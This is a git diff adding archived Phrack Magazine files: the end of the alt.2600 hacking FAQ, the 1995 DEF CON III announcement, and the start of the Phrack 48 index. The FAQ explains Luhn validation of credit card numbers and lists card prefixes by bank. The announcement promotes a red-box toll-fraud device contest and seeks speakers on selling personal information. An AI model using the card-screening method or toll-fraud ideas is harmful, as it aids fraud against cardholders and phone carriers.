+   Back issues of Phrack are found on many bulletin boards around the globe.
+   The only OFFICIAL Phrack Magazine distribution site is our ftp archive
+   at ftp.fc.net in /pub/phrack.  There are NO official distribution sites
+   other than this one, nor will there ever be.  We don't want to play
+   favorites and let one particular BBS call itself an "official" site while
+   another isn't.  Therefore, there will be no "official" sites except those
+   archived by Phrack itself.
+
+   You can also get back issues on the World Wide Web by connecting to:
+   http://www.fc.net/phrack.html
+
+   This URL allows users to view issues online, or pull them down for
+   later viewing.
+
+   Any users without net access can send diskettes and postage to the
+   Phrack Postal Address given above, and request back issues to be
+   sent via the postal system.
+
+Section F: Miscellaneous
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+01. What does XXX stand for?
+
+TLA     Three Letter Acronym
+
+ACL     Access Control List
+PIN     Personal Identification Number
+TCB     Trusted Computing Base
+
+ALRU    Automatic Line Record Update
+AN      Associated Number
+ARSB    Automated Repair Service Bureau
+ATH     Abbreviated Trouble History
+BOC     Bell Operating Company
+BOR     Basic Output Report
+BOSS    Business Office Servicing System
+CA      Cable
+COE     Central Office Equipment
+COSMOS  Computer System for Main Frame Operations
+CMC     Construction Maintenance Center
+CNID    Calling Number IDentification
+CO      Central Office
+COCOT   Customer Owned Coin Operated Telephone
+CRSAB   Centralized Repair Service Answering Bureau
+DDD     Direct Distance Dialing
+ECC     Enter Cable Change
+LD      Long Distance
+LMOS    Loop Maintenance Operations System
+MLT     Mechanized Loop Testing
+NPA     Numbering Plan Area
+POTS    Plain Old Telephone Service
+RBOC    Regional Bell Operating Company
+RSB     Repair Service Bureau
+SS      Special Service
+TAS     Telephone Answering Service
+TH      Trouble History
+TREAT   Trouble Report Evaluation and Analysis Tool
+
+LOD     Legion of Doom
+HFC     Hell Fire Club
+TNO     The New Order
+
+ACiD    Ansi Creators in Demand
+CCi     Cybercrime International
+FLT     Fairlight
+iCE     Insane Creators Enterprise
+iNC     International Network of Crackers
+NTA     The Nocturnal Trading Alliance
+PDX     Paradox
+PE      Public Enemy
+PSY     Psychose
+QTX     Quartex
+RZR     Razor (1911)
+S!P     Supr!se Productions
+TDT     The Dream Team
+THG     The Humble Guys
+THP     The Hill People
+TRSI    Tristar Red Sector Inc.
+UUDW    Union of United Death Workers
+
+
+02. How do I determine if I have a valid credit card number?
+
+Credit cards use the Luhn Check Digit Algorithm.  The main purpose of
+this algorithm is to catch data entry errors, but it does double duty
+here as a weak security tool.
+
+For a card with an even number of digits, double every odd numbered
+digit and subtract 9 if the product is greater than 9.  Add up all the
+even digits as well as the doubled-odd digits, and the result must be
+a multiple of 10 or it's not a valid card.  If the card has an odd
+number of digits, perform the same addition doubling the even numbered
+digits instead.
+
+
+03. What bank issued this credit card?
+
+1033    Manufacturers Hanover Trust
+1035    Citibank
+1263    Chemical Bank
+1665    Chase Manhattan
+4024    Bank of America
+4128    Citicorp
+4209    New Era Bank
+4302    HHBC
+4310    Imperial Savings
+4313    MBNA
+4317    California Federal
+5282    Wells Fargo
+5424    Citibank
+5410    Wells Fargo
+5432    Bank of New York
+6017    MBNA
+
+
+04. What are the ethics of hacking?
+
+An excerpt from: Hackers: Heroes of the Computer Revolution
+                          by Steven Levy
+
+        Access to computers -- and anything which might teach you
+        something about the way the world works -- should be unlimited
+        and total. Always yield to the Hands-On imperative.
+
+        All information should be free.
+
+        Mistrust Authority.  Promote Decentralization.
+
+        Hackers should be judged by their hacking, not bogus criteria
+        such as degrees, age, race, or position.
+
+        You can create art and beauty on a computer.
+
+        Computers can change your life for the better.
+
+
+04. Where can I get a copy of the alt.2600/#hack FAQ?
+
+Get it on FTP at:
+rahul.net      /pub/lps
+rtfm.mit.edu   /pub/usenet-by-group/alt.2600
+ftp.clark.net  /pub/jcase
+
+Get it on the World Wide Web at:
+http://dfw.net/~aleph1
+http://www.engin.umich.edu/~jgotts/hack-faq.html
+http://www.phantom.com/~king
+
+Get it from these BBS's:
+Hacker's Haven (303)343-4053
+
+
+
+
+
+EOT
diff --git a/phrack47/9.txt b/phrack47/9.txt
new file mode 100644
index 0000000..5fab718
--- /dev/null
+++ b/phrack47/9.txt
@@ -0,0 +1,582 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 9 of 22
+
+-----BEGIN PGP SIGNED MESSAGE-----
+
+                DEF CON III Convention Update #1.31 (04.04.95)
+              August 4-6th 1995 @ the Tropicana in Las Vegas
+
+XXXXXXXXXXXXXXXXXXXXXXXX XX      DEF CON III Initial Convention Announcement
+XXXXXXXxxxxXXXXXXXXXXXXXXX XX    DEF CON III Initial Convention Announcement
+XXXXXXxxxxxxXXXXXX  X    X       DEF CON III Initial Convention Announcement
+XXXXXxxxxxxxxXXXXXXX  X          DEF CON III Initial Convention Announcement
+XXXXxxxxxxxxxxXXXX XXXXXXXXX     DEF CON III Initial Convention Announcement
+XXXxxxxxxxxxxxxXXXXXXXXXX X      DEF CON III Initial Convention Announcement
+XXxxxxxxxxxxxxxxXXXXXX  XX  X    DEF CON III Initial Convention Announcement
+XXXxxxxxxxxxxxxXXXXXXXX          DEF CON III Initial Convention Announcement
+XXXXxxxxxxxxxxXXXXXXXX X XX      DEF CON III Initial Convention Announcement
+XXXXXxxxxxxxxXXXXXXXXXX  XX X    DEF CON III Initial Convention Announcement
+XXXXXXxxxxxxXXXXXXXXX X          DEF CON III Initial Convention Announcement
+XXXXXXXxxxxXXXXXXXXXXXXXXX       DEF CON III Initial Convention Announcement
+XXXXXXXXXXXXXXXXXXXXXXXXXXXX X   DEF CON III Initial Convention Announcement
+
+READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
+READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
+
+This is _not_ the professional sounding announcement.  Use that one to con
+your boss / employers out of the cost of the trip.  The professional
+announcement will be available on the FTP site and other more serious mailing
+lists and news groups, etc.  This is the k-RaD kriminal shout out to all u
+el1te hacker types that aren't in jail to attend 'da def con.  werd.
+
+READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
+READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
+
+What's this?  This is an initial announcement and invitation to DEF CON III,
+a convention for the "underground" elements of the computer culture.  We try
+to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies,
+Virii Coders, Programmers, Crackers, Cyberpunk Wannabees, Civil Liberties
+Groups, CypherPunks, Futurists, Artists, Criminally Insane, Hearing Impaired.
+
+WHO:   You know who you are, you shady characters.
+WHAT:  A convention for you to meet, party, and listen to some speeches
+       that you would normally never get to hear from some k-rad people.
+WHEN:  August 4, 5, 6 - 1995 (Speaking on the 5th and 6th)
+WHERE: Las Vegas, Nevada @ The Tropicana Hotel
+
+So you heard about DEF CON II, and want to hit part III?  You heard about the
+parties, the info discussed, the bizarre atmosphere of Las Vegas and want to
+check it out in person?  You want to do weird shit _away_ from the hotel
+where you can't get me in trouble?  Then you're just the person to attend!
+
+Sure it's great to meet and party with fellow hackers, but besides that we
+try to provide information and speakers in a forum that can't be found at
+other conferences.  While there is an initial concern that this is just
+another excuse for the evil hackers to party and wreak havoc, it's just
+not the case.  People come to DEF CON for information and for making
+contacts.  We strive to distinguish this convention from others in that
+respect.  Plus this year we have official DEF CON GOONS(c) who will pummel
+you until you pass out should you cause problems for other con.friendly
+people!  Big Brother loves you!
+
+What's been said (Only the good stuff will be quoted, of course)
+
+  Stevyn - "What can eye say, it was intense! . . . the whole con just
+     kicked ass!  I totally recommend you check out the next one."
+
+  Gail Thackeray, Prosecutor, "It's partly an entertaining party, it's
+     partly a fashion statement.  But it's mostly something about which the
+     business world has no clue."
+
+  Wendy Murdock, Boardwatch, "Def Con represents the tug-of-war that has
+     always been present - people strive to get that which is just out of
+     reach, aggravating governments and breaking rules in the process."
+
+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+
+WHERE IT IS:
+
+The Tropicana has rooms reserved for the convention.  Rooms are expensive.
+They are even more expensive if you don't book under the convention.  If it
+is to expensive for you, please see the section below on Las Vegas WWW sites
+that can provide you with information on other nearby hotels that are cheaper.
+Check-in is 3 pm, check-out time is 12 noon.  Remember there is an 8% sales
+tax in Vegas.
+
+               65$ Single or Double room, Midweek (Monday - Thursday)
+               90$ Single or Double room, Weekend (Friday - Sunday)
+               350$ One-Bedroom Suite (Call for Availability)
+
+     The Tropicana, 3801 Las Vegas Blvd. So., Las Vegas, Nevada, 89109
+          (702) 739-2581 or (800) 468-9494 or (702) 739-2448 (Fax)
+
+Held in three conference rooms at the Tropicana hotel in Las Vegas, DEF CON
+promises to be interesting.  The Tropicana has a huge pool (largest in the
+world?  Anyway, lots of cool movies have been filmed with this pool in them)
+and in August Vegas should be about 100(f) degrees at one in the morning.
+What do you care?  You'll be wired on caffeine and not sleeping anyway.  There
+are numerous attractions in town from the strip bars to the local COs in case
+you seek distraction.
+
+The Tropicana is located right on the "Strip" with the other three corners of
+the street occupied by the MGM Grand (Largest hotel in the world), the
+Excalibur, and the Luxor (The big sense-net pyramid).  If you can afford it
+I totally recommend spending some extra time in town.. there are too many
+cool things to do, especially if you have never visited.  Heck, last time I
+got to rent and fire uzi's and MP-5 machine guns (OK, so you can do that for
+cRacK in Los Angeles) see some strippers, and drink 1$ bottles of imported
+beer.  What a place!  Now you know why I chose Vegas for a location.
+
+
+
+
+
+
+
+
+
+                               SPECIAL EVENTS
+
+This year there will be a number of special events going down, including:
+
+[> Hacker Jeopardy       [> Spot the Fed Contest       [> Voice bridge
+[> Giveaways             [> A Red Box Creation Contest [> A Video Room
+[> Cool Video Shit       [> Scavenger Contest          [> Who knows?
+[> Group Battle Tech simulations at Virtual World.
+
+                                   COSTS
+
+The price of admission will be 30$ in advance (See the end of this
+announcement the address to pre-register to) or 40$ at the door.  This will
+include your goovie 24bit color name tag and a conference program.
+
+Don't forget to factor in Hotel costs, (The more people you crash with, the
+cheaper it is) gas, food, gambling, booze, strippers, bail, etc.
+
+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+
+                                   SPEAKERS
+
+This is a partial list of speakers for this year.  More are being invited
+or waiting to make plans.  As this list changes further announcements will
+be made.  This should give you a flavor or what to expect, though.
+
+[> Bruce Schneier, Author of "Applied Cryptography." TOPIC: Will speak
+   on issues surrounding cryptography, digital authentication, digital cash,
+   and will answer questions from the audience.
+
+[> John Perry Barlow, Visionary, etc.  If you don't know who this guy is
+   you definately need to attend.  TOPIC: TBA
+
+[> Winn Schwartau, Author of "Information Warfare" and "Terminal Compromise"
+   is a consultant to government and the private sector regarding enterprise
+   and national security concerns.  TOPICS: "Information Warfare, the year
+   in review" (Comedic) and "Tempest Attack Videos."
+
+[> Len Rose AKA Terminus.  After the legal fiasco Len faced years ago (as
+   partially chronicled in "The Hacker Crackdown.") this will be his first
+   chance to speak of his experiences without the threat of having his parole
+   revoked.  TOPIC: TBA
+
+[> Lewis De Payne, aka "Roscoe"  TOPIC: Ultra Hacking - Beyond Computers:
+   How to make your hacking more successful and productive while minimizing
+   risk.  Learn how to adopt a business-like strategy, planning your goals,
+   focusing your strategy and keeping you out of trouble!
+
+[> Curtis Karnow, former federal prosecutor and attorney focusing on
+   intellectual property litigation and computer law.  TOPIC: Agents in the
+   telecommunications context, and "smart" software that we 'trust' to do the
+   Right Thing.  The specific issue is legal liability and responsibility for
+   the actions of intelligent agents, and then spinning off to chat about the
+   liability for artificial intelligence generally.
+
+[> Robert D. Steele, President of OPEN SOURCE SOLUTIONS, Inc.  A former Spy,
+   Experienced Bureaucrat, Radical Visionary.  Tofflers call him the "rival
+   store" to CIA.  Keynote Speaker at HOPE, Workshop at Hac-Tic '93.
+   TOPIC: TBA
+
+[> The Electronic Frontier Foundation.  TOPIC:  The EFF will cover current
+   legal threats privacy and computer information networks.
+
+[> Stephen Cobb.  TOPIC: "The Party's Over: Why Hacking Sucks." Stepehen
+   intends to play "devil's advocate" and suggest that "hacking should not
+   be tolerated in any shape or form as it serves no useful purpose and is a
+   menace to society."
+
+[> Jim Settle, ex-FBI computer crime division department head.  TOPIC: TBA
+
+Speakers will be talking Saturday and Sunday, and maybe Friday depending.
+
+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+
+                                 SPECIAL EVENTS
+
+So you think you're so damn smart, eh?  Think your shit doesn't stink?
+Right. Think you got one up on the Feds, huh?  Well, now's your chance to
+prove it smarty-pants.   Winn Schwartau will take command and moderate.
+
+                           ! A N N O U N C I N G !
+
+                        H A C K E R   J E O P A R D Y
+
+That's right.  You can now prove how smart you really are.  Get up on stage
+and question a few answers, pile up the points  . . . and win big!
+
+You know the game.  You know the rules.  Now all you have to do is have the
+guts, get up on stage in front of your peers and the narks and show us all!
+
+When?  After Dark Tangent's opening speech (which we're all really looking
+forward to . . . [yawn]  HACKER JEOPARDY starts!
+
+                         MIDNIGHT - DAY 1 of DEF CON (Friday)
+
+If you wanna play . . . show up.  If you don't wanna play, show up.
+
+There will be three rounds of three people.  Just like real. The winners of
+each round will go into the Finals and the winner of that will win 25,000
+units of some foreign currency!  From Dark Tangent himself!  Plus:
+
+     - A T-shirt three sizes to small for the women.
+     - No T-shirts for the men.
+     - Silk jackets for everyone.
+     - One Heineken per player per round at DT's expense.
+     - Round trip directions to Hoover Dam.
+     - Phiber Optik's home address.
+     - Erik Bloodaxe's Blood Samples.
+     - And more . . .
+
+Contestants will be picked at random from a pool of those who want to play.
+If you don't wanna play, don't enter the contest.  Only the elite survive!
+
+FEDS:  If you get picked to play, and we ask you what your job is, YOU HAVE
+TO TELL THE TRUTH!  If you don't, our custom Fed-O-Meter will detect your
+lies and off to the casinos you go!
+
+Potential categories for questions include:
+
+- - Famous Busts  - Famous Narks  - UNIX Bugs  - Telco Tech  - "Hacking"
+and beware of the killer daily double.  Bribing the judge is acceptable.
+
+EMail your suggested questions and answers to winn at winn@infowar.com
+
+So, in the inimitable words of Al Bundy . . .  LET'S ROCK!
+
+
+
+
+
+                       3rd ANNUAL SPOT THE FED CONTEST
+                         Spot the fed, win the shirt
+
+"Like a paranoid version of pin the tail on the donkey, the favorite sport
+at this gathering of computer hackers and phone phreaks seems to be hunting
+down real and imagined telephone security and Federal and local law
+enforcement authorities who the attendees are certain are tracking their
+every move.. .. Of course, they may be right."  John Markhoff, NYT
+
+Basically the contest goes like this:  If you see some shady MB (Men in
+Black) earphone penny loafer sunglass wearing Clint Eastwood to live and
+die in L.A. type lurking about, point him out.  Just get my attention and
+claim out loud you think you have spotted a fed.  The people around at the
+time will then (I bet) start to discuss the possibility of whether or not a
+real fed has been spotted.  Once enough people have decided that a fed has
+been spotted, and the Identified Fed (I.F.) has had a say, and informal vote
+takes place, and if enough people think it's a true fed, or fed wanna-be,
+or other nefarious style character, you win a "I spotted the fed!" shirt,
+and the I.F. gets an "I am the fed!" shirt.
+
+Note to the feds:  This is all in good fun, and if you survive unmolested
+and undetected, but would still secretly like an "I am the fed!" shirt to
+wear around the office or when booting in doors, please contact me when no
+one is looking and I will take your order(s).  Just think of all the looks
+of awe you'll generate at work wearing this shirt while you file away all
+the paperwork you'll have to generate over this convention.  I won't turn in
+any feds who contact me, they have to be spotted by others.
+
+
+
+
+
+             TELEPHONE CONFERENCE BRIDGE (801-855-3326)
+
+For DEF CON III there will be a dial in conference set up.  If you are
+overseas, or just too poor to make it to the convention this year, you can
+still get an idea of what is going on and participate.  One part of the voice
+conference equipment will allow you to listen to the convention room
+microphone, another will allow you to ask questions during the Q&A sections
+of peoples speeches.  A general conversation area will be up so you can chat
+with others at the convention, or just others dialed into the bridge.
+Navigate through the voice mail maze and get free phone sex!  Impress others!
+
+The Voice bridge is up now at 801-855-3326.  It has 5 analog ports, but in a
+few weeks will have eight digital ports for better sound, etc.
+
+                     SPOOAH DOOPAH RAFFLE GIVE AWAY!@#
+
+Throughout the convention, between speakers and events there will be a raffle
+giveaway in which if your number is drawn, you win the prize.  Last year's
+giveaway included an ancient kaypro monochrome portable, a roll of Sprint
+"security" tape, "Computer Warriors" evil anti-virus cartoon, a 240 meg IDE
+HD, and other elite things.
+
+>> All the prizes given away are donated by other convention goers, so if <<
+>> you have any stuff to give away, please save and donate it to the con! <<
+
+                       RED BOX BUILDING CONTEST
+
+While we don't encourage or condone the use of toll fraud devices, we do
+encourage creativity and expression of thought.  We combine these and come
+up with a red box creating contest.  The final device doesn't have to
+produce the real red box tones (can't have people getting arrested) BUT it
+does have to produce some audible tones, any kind of tones.  This contest
+is inspired by last year's give away of a red box "Big Red" that looked just
+like a big pack of Big Red gum, but really was a red box.  Elite!  There was
+also a little girl's doll that was a red box, but the switch for that one was
+hidden under the dress and, well, it just wasn't given away.
+
+Come up with unique ideas!  With just a Hallmark card and some spare time you
+can create an elite 007 style tone generating device!  What will you win if
+yours is chosen as the most k-rad besides the envy of fellow hackers?  You'll
+get a tee shirt and the cost of admission to the convention refunded PLUS
+some as-of-yet undecided prize.  I bet you just can't wait to burn your
+fingers with your soldering iron now!
+
+                                THE VIDEO ROOM
+
+In one of the rooms a LCD wall projector will be hooked up connected to a
+VCR, and people can bring flicks to play.  Stuff like Max Headroom, War Games
+etc.  You know, the cool cheesey stuff.  Also some "hacker" videos will be
+shown.  If you have something you wanna show, bring it along.  When the
+projector is needed in the main conference room it will be swiped for the
+duration.
+
+                                COOL VIDEO SHIT
+
+At this time we are working to see if a T1 connection is possible.  If it is
+there will be a cu-see me connection set up with multiple video cameras in
+various locations.  Images will also be added automatically to a WWW page for
+people to snag.  As all this works itself out there will be further
+announcements.  No, there will be no "Hack our server" contests, and there
+will be "Security Professionals" with "Diagnostic Tools" to "Correct" any
+people who may cause the network problems.
+
+                               SCAVENGER CONTEST
+
+A scavenger contest is being planned.  The person or group with the most
+number of items on the list wins the prize.  (Prize undetermined as of yet)
+and there will be a few follow up prizes.  Don't forget to carry massive
+amounts of water as you run about the concrete jungle, dehydration can
+happen just crossing the street.  This is a contest for only the most k-rad.
+
+                GROUP BATTLE TECH SIMULATIONS AT VIRTUAL WORLD
+
+DEF CON has reserved groups of Battle Tech Pods on Friday and Saturday in
+order for people at the convention to battle it out in total VR mech-combat.
+There will be two teams, the White Hats and Black Hats, who will oppose
+eachother.  Each pod group <currently> consists of 8 pods, so it would be
+4 on 4 or we might join pod groups to make it an 8 on 8 battle.  In any
+event you need to reserve you space in the pod battle groups if you want in
+on the group action.  There will be battles going on Friday and Saturday
+before 5pm.  Cost is $25 for one hour of simulation per person.  Currently
+there are three pod groups of eight each open on Friday and two eight pod
+groups open on Saturady.  As people sign up DEF CON will reserve more pod
+groups if there is demand.
+
+If you are to chicken to get in on the group battle action there will also
+be a DEF CON group discount rate.
+
+If you are interested in signing up for a seat in the group e-mail me the
+day you want to participate and I will mail you back your log in name.  Give
+preference of White or Black hat status.  You will need to pay the $25 in
+advance to reserve your space.  Open spaces will be filled on a first come,
+first serve basis, and also during the con there _should_ be spaces available.
+The intent is get good con battle groups going.  A full battle tech info pack
+will be availbe on the FTP site soon, as well as in future announcements and
+on the mailing list.
+
+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+
+                             WHAT YOU CAN DO TO HELP
+
+DEF CON III will be planned right up until the last minute, with problems
+being fixed and new things being added all along.. a sort of work in progress
+that you get to witness in person when you show up.  Hopefully it won't be
+too messed up when presented to the public.  What can you do to help?
+
+=> Please help generate questions for Hacker Jeopardy.  Come up with some
+   questions and answers, and Winn will decide which ones to use.  Mail 'em
+   to winn@infowar.com.
+
+- -> We are looking for people to speak on Personnel Information Gathering and
+   selling.  Hopefully a speaker (who could remain anonymous) in this area
+   has experiences in gathering and selling such information.  If you know
+   of such a person, please invite them to contact me or let them know we
+   are looking for such speakers.
+
+- -> We are looking for some people to submit artwork to be used in the
+   convention someplace.  It could be a poster, or in the program.  Black
+   and white art would be eligible for the program only.
+
+- -> Articles and interesting FTP sites, WWW pages, mini FAQs, etc. are all
+   wanted for the program.  Quality articles that are informative and apply
+   to the theme of the convention.  Scanner frequency lists,
+
+
+
+
+
+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+
+                         MORE DEF CON INFORMATION
+
+The World Wide Web Page is located at: http://underground.org/defcon/
+
+FTP Site: ftp.fc.net /pub/defcon
+
+Mailing lists: mail majordomo@fc.net with the following statement in the body
+of your message: subscribe dc-announce    This will set you up on the mailing
+list and you will receive updated information, information on the other
+mailing lists offered, etc.  I suggest joining the dc-stuff list just so you
+can talk and plan with other people going to the con to coordinate rides,
+sharing of rooms, etc.
+
+Voice or Voice Mail:  0-700-826-4368 from a phone with AT&T LD.
+                     or 206-626-2526
+
+E-Mail: dtangent@defcon.org (The Dark Tangent)
+
+Snail Mail: 2709 E. Madison #102, Seattle, WA, 98112
+
+BBS System to call for info if you don't have net access:
+
+Alliance Communications - +1 612 251 2511 - USRobotics HST DS 16800
+                          NUP: New World Order
+
+Voice Bridge Chat System: 801-855-3326
+
+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+
+                    INFORMATION ABOUT LAS VEGAS
+
+NEWS GROUPS
+
+Please note the following newsgroups may or may not be designated for local
+distribution (Distribution: Vegas and/or nv), and is intended for all
+systems in the Las Vegas area or those interested in same on the same level
+as the la, ca, ba, ny, nyc, and other similar local higherarchies:
+
+vegas.bi                Talk for bisexually natured persons
+vegas.config            Configuration discussions for the higherarchy
+vegas.food              Anything about food in Las Vegas
+vegas.for-sale          For Sale/Want ads (no commercials, please!)
+vegas.general           General discussion
+vegas.jobs              Jobs offered and wanted in Las Vegas
+vegas.motss             MOTSS community talk
+vegas.personals         Personal ads - any nature
+vegas.singles           Talk for singles
+vegas.test              Group to test post to
+
+WWW PAGES about Las Vegas, Hotels, Things to do, etc.
+
+HTTP://www.infi.net:80/vegas/online/
+HTTP://www.ocf.berkeley.edu/~iew/index.html
+HTTP://www.best.com/~rdc/roger/vegas.html
+HTTP://www.intermind.net/las.vegas.on-line/homepage.html
+
+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+
+                                 STUFF TO BUY
+
+Stuff is for sale from DEF CON I and II in case you are interested.  From the
+first year we have audio tapes (4 90 minute tapes) for $20 and the second
+year (10 90 minute tapes) for $30.  Descriptions of these tapes are below.
+
+DEF CON I Tapes (4) include the following speakers:
+
+Ray Kaplan, Curtis Karnow, Gail Thackeray, Dead Addict, Dark Druid, Judi Clark
+Dan Farmer, and Dr. Mark Ludwig.
+
+DEF CON II Tapes (10) include the following speakers:
+
+Phillip Zimmermann : Keynote Speaker, PGP.
+Gail Thackeray : Response to Mr. Zimmermann and Privacy issues.
+Chris Hall : Electronic Surveillance.
+Curtis Karnow : Recombinant Culture, Crime in the Digital Network.
+Dr. Mark Ludwig : Virus Creation Awards and What to do when the Feds come.
+Judi Clark, Mara, Fen and Marianne in a Round Table Discussion.
+The Dark Knight : Hacking in the UK
+Sara Gordon, Mark Aldrich, Phil Zimmermann: Internet and PGP privacy concerns.
+Annaliza (Torquie) : The European Underground scene.
+Mark Lottor : Various cellular topics.
+Winn Schwartau : HERF guns, Van Eck, Information Warfare
+Peter Beruk : The role of the SPA, general Q&A.
+Padgett Peterson : Anti-Virus writing, Cleaning up other peoples messes.
+The Jackal : A basic radio overview with Q&A.
+Artimage : Underground spoof and give aways.
+Stephen Dunifer : Radio Free Berkeley and pirate media.
+Damien Thorn : Random Cell information from the late night tech talks.
+
+SHIRTS are still available to buy.  The ones remaining are long sleeve white
+with the choice of two styles.  Both styles have a three color logo on the
+front (Red, Gray, Black) with "DEF CON".  The back is either a list of
+strange grep key words and "inside" keywords with "Why?  Because I can." at
+the top.  Back #2 is the same back as DEF CON I with the old and "new" 4
+Amendment as stated by J.P. Barlow with "Protect your rights, Encrypt your
+data..." at the top.  The back on this style is two colors.. black lettering
+framed in light gray for better definition.  Shirts are $20.
+
+SHIPPING : If you buy anything, please include 2.90 for priority shipping.
+
+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+
+                                LAST AND LEAST
+
+OK!  Your almost ready to go.  Now here is an E-Z to follow checklist of
+things you should take care of before throwing caution to the wind and
+bailing out to the dangerous and sexy-wrong world of Las Vegas.  In the
+words of one famous (and abused) phone system: "Sit up straight, PAY
+ATTENTION, Listen to what your being told. (Now try again)"  (Whoever can
+identify that phone system first gets in free)
+
+                    StUPh 2 D0 b3fore the C0nvent1ion:
+
+_  Check out inpho about Vegas so you know what you wanna do.
+_  Get a hotel room or some crash pad.
+_  Bring $40 for admission or pay $30 in advance.
+_  Bring your PGP key on disk to key sign with others.
+_  Bring Laptop, laplink, serial, and bizarre gender changer cables.
+_  Bring things to donate for the give-away raffle.
+_  Leave massively incriminating evidence at home.
+_  Police scanners can provide hours of fun in Vegas.
+_  Bring interesting videos to play in the video room.
+_  Caffeine and snacks are fun to eat.
+_  Don't forget any drugs or medication you may need.
+_  You won't need saline for your contact lenses, you won't be sleeping.
+_  Anything you promised your friends you would bring for them.
+_  Join the mailing list and arrange rides or rooms with others in advance.
+
+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+
+                                 MY PGP KEY
+
+                       This is the unsigned version
+        My signed version is available on the public key-servers
+
+- -----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.1
+
+mQCNAy6v5H8AAAEEAJ7xUzvdRFMtJW3CLRs2yXL0BC9dBiB6+hAPgBVqSWbHWVIT
+/5A38LPA4zqeGnGpmZjGev6rPeFEGxDfoV68voLOonRPcea9d/ow0Aq2V5I0nUrl
+LKU7gi3TgEXvhUmk04hjr8Wpr92cTEx4cIlvAeyGkoirb+cihstEqldGqClNAAUR
+tCZUaGUgRGFyayBUYW5nZW50IDxkdGFuZ2VudEBkZWZjb24ub3JnPg==
+=ngNC
+- -----END PGP PUBLIC KEY BLOCK-----
+
+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+
+                      WHY IS THE ANNOUNCEMENT SIGNED?
+
+Well, last year it came to my attention that some unknown person in
+California had modified an announcement and was having people mail their
+pre-registration money to them instead.  It was actually pretty funny.  Only
+one person was fooled and lost 10$.  Not bad.  I knew something was up when
+he said he had pre-registered for 10$ and had the receipt I had supposedly
+mailed back.  I am never that organized!  To avoid potential problems like
+this one please verify this announcement!@#  My key is available for
+verification on public key servers, and my key-id is 46A8294D.  The
+other key you will find on servers may be my older 1284bit key, which is
+still good, but just not used to sign this text.
+
+END ANNOUNCEMENT ------------------------------------------------------------
+
+-----BEGIN PGP SIGNATURE-----
+Version: 2.6.2
+
+iQCzAwUBL4Hv6LGddDV5azd9AQHP2wTrBqZlL222IicVGNAphJTfaj3gDCQMWhfc
+dXzCy20cAiymx/AmI5R2RpOhe/n2UJE99Ml97YKcVRLTFZNehvPorPbFZXeEURCN
+QUvS13sEDn/PrxTxgd5pLgBsEx+HCGPvwK3W3BstwWR2srB4oap2SMSwZdLqDFMg
++kCCn17guAoHnUtqftvjUX2FOGt1AmVOf+cQM43RjpENUfOsBWg=
+=vMBG
+-----END PGP SIGNATURE-----
+
diff --git a/phrack48/1.txt b/phrack48/1.txt
new file mode 100644
index 0000000..c5aa935
--- /dev/null
+++ b/phrack48/1.txt
@@ -0,0 +1,286 @@
+                              ==Phrack Magazine==
+
+                   Volume Seven, Issue Forty-Eight, File 1 of 18
+
+                                 Issue 48 Index
+                              ___________________
+
+                               P H R A C K   4 8
+
+                               September 1, 1996
+                              ___________________
+
+~ WARNING!  This is a TOP SECRET-MAGIC EYES ONLY document containing
+compartmenalized information essential to the national security of the
+United States.  EYES ONLY ACCESS to the material herein is strictly
+limited to personnel possessing MAGIC-12 CLEARANCE LEVEL.  Examination
+or use by unauthorized personnel is strictly forbidden and is punishable
+by federal law. ~
+
+
+Yes, it's the annual issue of Phrack you've all been waiting for,
+hopefully you have kept your security clearances current.  The delay has
+been a long one, much longer than anyone would have liked.  Obviously
+Phrack was never meant to be put out so infrequently, but the
+continual pressures of daily life have taken their toll on yet
+another editor.  Yes, those little things like going to work, paying
+the rent and all the other hassles that interfere with putting out a
+large quarterly hobbbyist publication.
+
+It finally came down to three choices:  keep the status quo and put out an
+issue whenever, charge per issue, or get in some new blood.  Obviously the
+status quo sucked, and an issue a year was just unacceptable.  Charging
+everyone was even more unacceptable, even though "Information wants to
+be $4.95."  So, that left bringing in more people to help.
+
+The hard thing was finding people worth bringing into the fold.
+There was never any shortage of people who wanted to take over the
+whole magazine, but it wasn't until three of them banded together and
+volunteered to take over the main editorial nightmare that it looked
+like there was a light at the end of the tunnel.  Voyager, maintainer of
+the #hack FAQ and editor of CoTNO, RedDragon editor of FeH and
+continual discoverer of Linux root bugs, and Daemon9 admin of InfoNexus and
+text file author extraordinaire, came forward en masse and said,
+"We'll do it."
+
+Most of you have no idea how hard it is to put out a magazine like Phrack
+with any degree of regularity.  You have to track down articles, answer
+tons of mail, read all kinds of news, edit the articles (most of which
+were written with English as a second languge,) maintain the mailing
+list, maintain the WWW site, etc.  Hopefully with all the new
+people involved, the new division of labor will allow everyone to
+contribute and put out a magazine in a very timely fashion.  (And allow poor
+old Erikb to rest easy knowing the magazine is being taken care of so
+he can devote more time to being a puppet-like stooge of The Man.)
+
+In any case, you've waited long enough...here's Issue 48.
+
+-------------------------------------------------------------------------
+
+                        READ THE FOLLOWING
+
+                IMPORTANT REGISTRATION INFORMATION
+
+Corporate/Institutional/Government:  If you are a business,
+institution or government agency, or otherwise employed by,
+contracted to or providing any consultation relating to computers,
+telecommunications or security of any kind to such an entity, this
+information pertains to you.
+
+You are instructed to read this agreement and comply with its
+terms and immediately destroy any copies of this publication
